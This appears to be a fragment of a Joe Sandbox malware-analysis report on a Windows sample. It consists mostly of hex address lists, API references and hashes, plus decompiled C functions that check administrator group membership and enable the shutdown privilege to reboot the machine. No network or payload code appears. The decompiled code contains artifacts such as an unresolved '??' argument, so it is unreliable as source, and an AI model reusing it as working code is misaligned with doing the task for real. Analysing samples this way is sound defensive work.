                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009760a2
                                                                                                                                                                                                                                              0x009760aa
                                                                                                                                                                                                                                              0x009760b2
                                                                                                                                                                                                                                              0x009760b7
                                                                                                                                                                                                                                              0x009760bd
                                                                                                                                                                                                                                              0x009760bf
                                                                                                                                                                                                                                              0x009760bf
                                                                                                                                                                                                                                              0x009760d6
                                                                                                                                                                                                                                              0x009760e0
                                                                                                                                                                                                                                              0x009760e7
                                                                                                                                                                                                                                              0x009760f5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009760f5
                                                                                                                                                                                                                                              0x0097609c
                                                                                                                                                                                                                                              0x00976081
                                                                                                                                                                                                                                              0x00975e62
                                                                                                                                                                                                                                              0x00975e62
                                                                                                                                                                                                                                              0x00975e65
                                                                                                                                                                                                                                              0x00975fd3
                                                                                                                                                                                                                                              0x00975fe9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975fef
                                                                                                                                                                                                                                              0x00975fef
                                                                                                                                                                                                                                              0x00975ff7
                                                                                                                                                                                                                                              0x00975ffd
                                                                                                                                                                                                                                              0x00976003
                                                                                                                                                                                                                                              0x00976006
                                                                                                                                                                                                                                              0x00976011
                                                                                                                                                                                                                                              0x00976014
                                                                                                                                                                                                                                              0x0097603d
                                                                                                                                                                                                                                              0x00976016
                                                                                                                                                                                                                                              0x00976018
                                                                                                                                                                                                                                              0x00976019
                                                                                                                                                                                                                                              0x0097601b
                                                                                                                                                                                                                                              0x00976033
                                                                                                                                                                                                                                              0x0097601d
                                                                                                                                                                                                                                              0x00976020
                                                                                                                                                                                                                                              0x00976029
                                                                                                                                                                                                                                              0x00976022
                                                                                                                                                                                                                                              0x00976022
                                                                                                                                                                                                                                              0x00976022
                                                                                                                                                                                                                                              0x00976020
                                                                                                                                                                                                                                              0x0097601b
                                                                                                                                                                                                                                              0x00976042
                                                                                                                                                                                                                                              0x00976044
                                                                                                                                                                                                                                              0x00976046
                                                                                                                                                                                                                                              0x0097604a
                                                                                                                                                                                                                                              0x00975ff7
                                                                                                                                                                                                                                              0x00975fd5
                                                                                                                                                                                                                                              0x00975fd8
                                                                                                                                                                                                                                              0x00975fd8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975e6b
                                                                                                                                                                                                                                              0x00975e6b
                                                                                                                                                                                                                                              0x00975e6e
                                                                                                                                                                                                                                              0x00975f8b
                                                                                                                                                                                                                                              0x00975f99
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975f9f
                                                                                                                                                                                                                                              0x00975fa7
                                                                                                                                                                                                                                              0x00975faf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975fb1
                                                                                                                                                                                                                                              0x00975fb3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975fb5
                                                                                                                                                                                                                                              0x00975fb7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975fb9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975fb9
                                                                                                                                                                                                                                              0x00975fb7
                                                                                                                                                                                                                                              0x00975fb3
                                                                                                                                                                                                                                              0x00975faf
                                                                                                                                                                                                                                              0x00975f8d
                                                                                                                                                                                                                                              0x00975f8d
                                                                                                                                                                                                                                              0x00975f8d
                                                                                                                                                                                                                                              0x00975f8f
                                                                                                                                                                                                                                              0x00975fc1
                                                                                                                                                                                                                                              0x00975fc1
                                                                                                                                                                                                                                              0x00975fc1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975e74
                                                                                                                                                                                                                                              0x00975e74
                                                                                                                                                                                                                                              0x00975e77
                                                                                                                                                                                                                                              0x00975ea0
                                                                                                                                                                                                                                              0x00975ebd
                                                                                                                                                                                                                                              0x00975f79
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975f7f
                                                                                                                                                                                                                                              0x00975ec3
                                                                                                                                                                                                                                              0x00975ec3
                                                                                                                                                                                                                                              0x00975ecc
                                                                                                                                                                                                                                              0x00975ed4
                                                                                                                                                                                                                                              0x00975ed6
                                                                                                                                                                                                                                              0x00975edc
                                                                                                                                                                                                                                              0x00975edf
                                                                                                                                                                                                                                              0x00975eea
                                                                                                                                                                                                                                              0x00975eed
                                                                                                                                                                                                                                              0x00975f3f
                                                                                                                                                                                                                                              0x00975f40
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975eef
                                                                                                                                                                                                                                              0x00975eef
                                                                                                                                                                                                                                              0x00975ef2
                                                                                                                                                                                                                                              0x00975f34
                                                                                                                                                                                                                                              0x00975ef4
                                                                                                                                                                                                                                              0x00975ef4
                                                                                                                                                                                                                                              0x00975ef7
                                                                                                                                                                                                                                              0x00975f2b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975ef9
                                                                                                                                                                                                                                              0x00975ef9
                                                                                                                                                                                                                                              0x00975efc
                                                                                                                                                                                                                                              0x00975f22
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975efe
                                                                                                                                                                                                                                              0x00975eff
                                                                                                                                                                                                                                              0x00975f02
                                                                                                                                                                                                                                              0x00975f16
                                                                                                                                                                                                                                              0x00975f04
                                                                                                                                                                                                                                              0x00975f07
                                                                                                                                                                                                                                              0x00975f0d
                                                                                                                                                                                                                                              0x00975f46
                                                                                                                                                                                                                                              0x00975f46
                                                                                                                                                                                                                                              0x00975f09
                                                                                                                                                                                                                                              0x00975f09
                                                                                                                                                                                                                                              0x00975f09
                                                                                                                                                                                                                                              0x00975f07
                                                                                                                                                                                                                                              0x00975f02
                                                                                                                                                                                                                                              0x00975efc
                                                                                                                                                                                                                                              0x00975ef7
                                                                                                                                                                                                                                              0x00975ef2
                                                                                                                                                                                                                                              0x00975f4c
                                                                                                                                                                                                                                              0x00975f4e
                                                                                                                                                                                                                                              0x00975f50
                                                                                                                                                                                                                                              0x00975f54
                                                                                                                                                                                                                                              0x00975ed4
                                                                                                                                                                                                                                              0x00975ea2
                                                                                                                                                                                                                                              0x00975ea4
                                                                                                                                                                                                                                              0x00975eaf
                                                                                                                                                                                                                                              0x00975eaf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975e79
                                                                                                                                                                                                                                              0x00975e7d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975e83
                                                                                                                                                                                                                                              0x00975e83
                                                                                                                                                                                                                                              0x00975e83
                                                                                                                                                                                                                                              0x00975e85
                                                                                                                                                                                                                                              0x00975e85
                                                                                                                                                                                                                                              0x00975e8e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975e94
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975e94
                                                                                                                                                                                                                                              0x00975e8e
                                                                                                                                                                                                                                              0x00975e7d
                                                                                                                                                                                                                                              0x00975e77
                                                                                                                                                                                                                                              0x00975e6e
                                                                                                                                                                                                                                              0x00975e65
                                                                                                                                                                                                                                              0x00975e5c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975dd0
                                                                                                                                                                                                                                              0x00975dd0
                                                                                                                                                                                                                                              0x00975dd0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975dd0
                                                                                                                                                                                                                                              0x00975dce
                                                                                                                                                                                                                                              0x00975dca
                                                                                                                                                                                                                                              0x00975dba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975d00
                                                                                                                                                                                                                                              0x00975dd9
                                                                                                                                                                                                                                              0x00975e04
                                                                                                                                                                                                                                              0x009761fe
                                                                                                                                                                                                                                              0x00975e0a
                                                                                                                                                                                                                                              0x00975e0c
                                                                                                                                                                                                                                              0x00975e17
                                                                                                                                                                                                                                              0x00975e17
                                                                                                                                                                                                                                              0x00975e04
                                                                                                                                                                                                                                              0x00976200
                                                                                                                                                                                                                                              0x00976200
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharNextA.USER32(?,00000000,?,?), ref: 00975CEE
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00978B3E,00000104,00000000,?,?), ref: 00975DFC
                                                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 00975E3E
                                                                                                                                                                                                                                              • CharUpperA.USER32(-00000052), ref: 00975EE1
                                                                                                                                                                                                                                              • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00975F6F
                                                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 00975FA7
                                                                                                                                                                                                                                              • CharUpperA.USER32(-0000004E), ref: 00976008
                                                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 009760AA
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00971140,00000000,00000040,00000000), ref: 009761F1
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 009761F8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                              • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                              • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                              • Opcode ID: bc33ef48521189ff2bdb41954c7ef72e91cc321ef65d0a46eccb0e54d96102b2
                                                                                                                                                                                                                                              • Instruction ID: d7a6d92cd57bc708e01a35a68c080af82d2366a94da3a701b43b5edd1dacad3e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc33ef48521189ff2bdb41954c7ef72e91cc321ef65d0a46eccb0e54d96102b2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45D15E73A48E445EDFB58B389C4C3FA3B69AB56304F55C4AAC4CED6191D6F48EC28B04
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                                                                                                              			E009718A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				short _v12;
                                                                                                                                                                                                                                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                                                                              				long _v24;
                                                                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                                                                              				void* _v32;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                                                                              				long _t45;
                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                              				int _t50;
                                                                                                                                                                                                                                              				void* _t52;
                                                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t51 = __esi;
                                                                                                                                                                                                                                              				_t49 = __edx;
                                                                                                                                                                                                                                              				_t23 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                              				_t25 =  *0x978128; // 0x2
                                                                                                                                                                                                                                              				_t45 = 0;
                                                                                                                                                                                                                                              				_v12 = 0x500;
                                                                                                                                                                                                                                              				_t50 = 2;
                                                                                                                                                                                                                                              				_v16.Value = 0;
                                                                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                                                                              				if(_t25 != _t50) {
                                                                                                                                                                                                                                              					L20:
                                                                                                                                                                                                                                              					return E00976CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(E009717EE( &_v20) != 0) {
                                                                                                                                                                                                                                              					_t25 = _v20;
                                                                                                                                                                                                                                              					if(_v20 != 0) {
                                                                                                                                                                                                                                              						 *0x978128 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                              					L17:
                                                                                                                                                                                                                                              					CloseHandle(_v28);
                                                                                                                                                                                                                                              					_t25 = _v20;
                                                                                                                                                                                                                                              					goto L20;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_push(__esi);
                                                                                                                                                                                                                                              					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                              					if(_t52 == 0) {
                                                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                                                              						_pop(_t51);
                                                                                                                                                                                                                                              						goto L17;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                              						L15:
                                                                                                                                                                                                                                              						LocalFree(_t52);
                                                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if( *_t52 <= 0) {
                                                                                                                                                                                                                                              							L14:
                                                                                                                                                                                                                                              							FreeSid(_v32);
                                                                                                                                                                                                                                              							goto L15;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                              						_t50 = _t15;
                                                                                                                                                                                                                                              						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                              							_t45 = _t45 + 1;
                                                                                                                                                                                                                                              							_t50 = _t50 + 8;
                                                                                                                                                                                                                                              							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0x978128 = 1;
                                                                                                                                                                                                                                              						_v20 = 1;
                                                                                                                                                                                                                                              						goto L14;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x009718a3
                                                                                                                                                                                                                                              0x009718a3
                                                                                                                                                                                                                                              0x009718ab
                                                                                                                                                                                                                                              0x009718b2
                                                                                                                                                                                                                                              0x009718b5
                                                                                                                                                                                                                                              0x009718be
                                                                                                                                                                                                                                              0x009718c0
                                                                                                                                                                                                                                              0x009718c6
                                                                                                                                                                                                                                              0x009718c7
                                                                                                                                                                                                                                              0x009718ca
                                                                                                                                                                                                                                              0x009718cf
                                                                                                                                                                                                                                              0x009719c9
                                                                                                                                                                                                                                              0x009719d8
                                                                                                                                                                                                                                              0x009719d8
                                                                                                                                                                                                                                              0x009718df
                                                                                                                                                                                                                                              0x009719b8
                                                                                                                                                                                                                                              0x009719bd
                                                                                                                                                                                                                                              0x009719bf
                                                                                                                                                                                                                                              0x009719bf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009719bd
                                                                                                                                                                                                                                              0x009718fa
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971912
                                                                                                                                                                                                                                              0x009719aa
                                                                                                                                                                                                                                              0x009719ad
                                                                                                                                                                                                                                              0x009719b3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971927
                                                                                                                                                                                                                                              0x00971927
                                                                                                                                                                                                                                              0x00971932
                                                                                                                                                                                                                                              0x00971936
                                                                                                                                                                                                                                              0x009719a9
                                                                                                                                                                                                                                              0x009719a9
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009719a9
                                                                                                                                                                                                                                              0x0097194c
                                                                                                                                                                                                                                              0x009719a2
                                                                                                                                                                                                                                              0x009719a3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097196e
                                                                                                                                                                                                                                              0x00971970
                                                                                                                                                                                                                                              0x00971999
                                                                                                                                                                                                                                              0x0097199c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097199c
                                                                                                                                                                                                                                              0x00971972
                                                                                                                                                                                                                                              0x00971972
                                                                                                                                                                                                                                              0x00971975
                                                                                                                                                                                                                                              0x00971984
                                                                                                                                                                                                                                              0x00971985
                                                                                                                                                                                                                                              0x0097198a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097198c
                                                                                                                                                                                                                                              0x00971991
                                                                                                                                                                                                                                              0x00971996
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971996
                                                                                                                                                                                                                                              0x0097194c

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 009717EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,009718DD), ref: 0097181A
                                                                                                                                                                                                                                                • Part of subcall function 009717EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0097182C
                                                                                                                                                                                                                                                • Part of subcall function 009717EE: AllocateAndInitializeSid.ADVAPI32(009718DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,009718DD), ref: 00971855
                                                                                                                                                                                                                                                • Part of subcall function 009717EE: FreeSid.ADVAPI32(?,?,?,?,009718DD), ref: 00971883
                                                                                                                                                                                                                                                • Part of subcall function 009717EE: FreeLibrary.KERNEL32(00000000,?,?,?,009718DD), ref: 0097188A
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 009718EB
                                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 009718F2
                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0097190A
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00971918
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000000,?,?), ref: 0097192C
                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00971944
                                                                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00971964
                                                                                                                                                                                                                                              • EqualSid.ADVAPI32(00000004,?), ref: 0097197A
                                                                                                                                                                                                                                              • FreeSid.ADVAPI32(?), ref: 0097199C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 009719A3
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 009719AD
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2168512254-0
                                                                                                                                                                                                                                              • Opcode ID: 75f740de111c825b44fe972b366cd6216434fcc09fe5f5be1ae4f1c252c1083d
                                                                                                                                                                                                                                              • Instruction ID: 049e150928f4a72de258acdd968869e82c26ddcc12bf66d54691e8397ead23d0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75f740de111c825b44fe972b366cd6216434fcc09fe5f5be1ae4f1c252c1083d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4313273A14209AFDB10DFA9EC59ABFBBBCFF45700F104825E649E2150E7309946DB61
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                                                                                                              			E00971F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				int _v12;
                                                                                                                                                                                                                                              				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                              				void* _v28;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                                                                              				int _t28;
                                                                                                                                                                                                                                              				signed char _t30;
                                                                                                                                                                                                                                              				void* _t38;
                                                                                                                                                                                                                                              				void* _t40;
                                                                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t41 = __esi;
                                                                                                                                                                                                                                              				_t38 = __edi;
                                                                                                                                                                                                                                              				_t30 = __ecx;
                                                                                                                                                                                                                                              				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                              						L14:
                                                                                                                                                                                                                                              						if( *0x979a40 != 0) {
                                                                                                                                                                                                                                              							_pop(_t30);
                                                                                                                                                                                                                                              							_t44 = _t46;
                                                                                                                                                                                                                                              							_t13 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                              							_push(_t38);
                                                                                                                                                                                                                                              							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                              								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                              								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                              								_v12 = 2;
                                                                                                                                                                                                                                              								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                              								CloseHandle(_v28);
                                                                                                                                                                                                                                              								_t41 = _t41;
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								if(_t21 != 0) {
                                                                                                                                                                                                                                              									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                              										_t25 = 1;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t37 = 0x4f7;
                                                                                                                                                                                                                                              										goto L3;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t37 = 0x4f6;
                                                                                                                                                                                                                                              									goto L4;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t37 = 0x4f5;
                                                                                                                                                                                                                                              								L3:
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								L4:
                                                                                                                                                                                                                                              								_push(0x10);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                                              								E009744B9(0, _t37);
                                                                                                                                                                                                                                              								_t25 = 0;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_pop(_t40);
                                                                                                                                                                                                                                              							return E00976CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t37 = 0x522;
                                                                                                                                                                                                                                              						_t28 = E009744B9(0, 0x522, 0x971140, 0, 0x40, 4);
                                                                                                                                                                                                                                              						if(_t28 != 6) {
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					__eax = E00971EA7(__ecx);
                                                                                                                                                                                                                                              					if(__eax != 2) {
                                                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                                                              						return _t28;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}

















                                                                                                                                                                                                                                              0x00971f90
                                                                                                                                                                                                                                              0x00971f90
                                                                                                                                                                                                                                              0x00971f93
                                                                                                                                                                                                                                              0x00971f98
                                                                                                                                                                                                                                              0x00971fa4
                                                                                                                                                                                                                                              0x00971fa7
                                                                                                                                                                                                                                              0x00971fc5
                                                                                                                                                                                                                                              0x00971fcd
                                                                                                                                                                                                                                              0x00971fdb
                                                                                                                                                                                                                                              0x00971ee5
                                                                                                                                                                                                                                              0x00971eea
                                                                                                                                                                                                                                              0x00971ef1
                                                                                                                                                                                                                                              0x00971ef4
                                                                                                                                                                                                                                              0x00971f0c
                                                                                                                                                                                                                                              0x00971f2e
                                                                                                                                                                                                                                              0x00971f3a
                                                                                                                                                                                                                                              0x00971f46
                                                                                                                                                                                                                                              0x00971f4d
                                                                                                                                                                                                                                              0x00971f58
                                                                                                                                                                                                                                              0x00971f60
                                                                                                                                                                                                                                              0x00971f61
                                                                                                                                                                                                                                              0x00971f62
                                                                                                                                                                                                                                              0x00971f75
                                                                                                                                                                                                                                              0x00971f80
                                                                                                                                                                                                                                              0x00971f77
                                                                                                                                                                                                                                              0x00971f77
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971f77
                                                                                                                                                                                                                                              0x00971f64
                                                                                                                                                                                                                                              0x00971f64
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971f64
                                                                                                                                                                                                                                              0x00971f0e
                                                                                                                                                                                                                                              0x00971f0e
                                                                                                                                                                                                                                              0x00971f13
                                                                                                                                                                                                                                              0x00971f13
                                                                                                                                                                                                                                              0x00971f14
                                                                                                                                                                                                                                              0x00971f14
                                                                                                                                                                                                                                              0x00971f16
                                                                                                                                                                                                                                              0x00971f17
                                                                                                                                                                                                                                              0x00971f1a
                                                                                                                                                                                                                                              0x00971f1f
                                                                                                                                                                                                                                              0x00971f1f
                                                                                                                                                                                                                                              0x00971f86
                                                                                                                                                                                                                                              0x00971f8f
                                                                                                                                                                                                                                              0x00971fcf
                                                                                                                                                                                                                                              0x00971fd3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971fd3
                                                                                                                                                                                                                                              0x00971fa9
                                                                                                                                                                                                                                              0x00971fb4
                                                                                                                                                                                                                                              0x00971fbb
                                                                                                                                                                                                                                              0x00971fc3
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971fc3
                                                                                                                                                                                                                                              0x00971f9a
                                                                                                                                                                                                                                              0x00971f9a
                                                                                                                                                                                                                                              0x00971fa2
                                                                                                                                                                                                                                              0x00971fd9
                                                                                                                                                                                                                                              0x00971fda
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00971fa2

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00971EFB
                                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00971F02
                                                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00971FD3
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
